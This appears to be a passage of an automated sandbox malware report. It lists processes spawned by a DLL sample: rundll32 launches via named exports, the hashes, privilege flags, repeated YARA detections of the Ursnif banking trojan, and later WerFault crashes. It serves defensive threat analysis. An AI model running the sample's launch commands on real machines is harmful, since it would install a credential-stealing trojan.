                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:loaddll32.exe 'C:\Users\user\Desktop\616412739e268.dll'
                                                                                                                        Imagebase:0xd40000
                                                                                                                        File size:893440 bytes
                                                                                                                        MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.916793229.0000000003BB8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.916426520.0000000003BB8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.916847995.0000000003BB8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.916379765.0000000003BB8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.1049081119.000000000383F000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.916579363.0000000003BB8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.960454814.0000000003A3B000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.917263832.0000000003BB8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.1185910848.00000000037C0000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.916716758.0000000003BB8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.859623257.0000000001390000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.916652805.0000000003BB8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.1006058312.000000000393D000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.916501324.0000000003BB8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.1185750269.0000000003559000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        Reputation:moderate

                                                                                                                        General

                                                                                                                        Start time:00:36:04
                                                                                                                        Start date:12/10/2021
                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                                                                                                                        Imagebase:0x11d0000
                                                                                                                        File size:232960 bytes
                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Start time:00:36:04
                                                                                                                        Start date:12/10/2021
                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:rundll32.exe C:\Users\user\Desktop\616412739e268.dll,BeGrass
                                                                                                                        Imagebase:0x910000
                                                                                                                        File size:61952 bytes
                                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.815784536.0000000003220000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Start time:00:36:04
                                                                                                                        Start date:12/10/2021
                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                                                                                                                        Imagebase:0x910000
                                                                                                                        File size:61952 bytes
                                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.974874720.000000000573B000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.1187092392.00000000054C0000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.930983342.00000000058B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.930624015.00000000058B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.1020193164.000000000563D000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.930910657.00000000058B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.931064048.00000000058B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.817641494.0000000003420000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.930863354.00000000058B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.1063376109.000000000553F000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.931519942.00000000058B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.931136929.00000000058B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.930715901.00000000058B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.1186977706.0000000005229000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.930775995.00000000058B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Start time:00:36:09
                                                                                                                        Start date:12/10/2021
                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Fieldeight
                                                                                                                        Imagebase:0x910000
                                                                                                                        File size:61952 bytes
                                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000003.843034391.00000000008A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Start time:00:36:17
                                                                                                                        Start date:12/10/2021
                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Often
                                                                                                                        Imagebase:0x910000
                                                                                                                        File size:61952 bytes
                                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000003.855981301.0000000002EC0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000003.888775678.0000000004D09000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Start time:00:37:46
                                                                                                                        Start date:12/10/2021
                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7072 -s 636
                                                                                                                        Imagebase:0x10e0000
                                                                                                                        File size:434592 bytes
                                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                        General

                                                                                                                        Start time:00:37:51
                                                                                                                        Start date:12/10/2021
                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 644
                                                                                                                        Imagebase:0x10e0000
                                                                                                                        File size:434592 bytes
                                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                        General

                                                                                                                        Start time:00:37:56
                                                                                                                        Start date:12/10/2021
                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 632
                                                                                                                        Imagebase:0x10e0000
                                                                                                                        File size:434592 bytes
                                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                        Disassembly

                                                                                                                        Code Analysis

                                                                                                                        Reset < >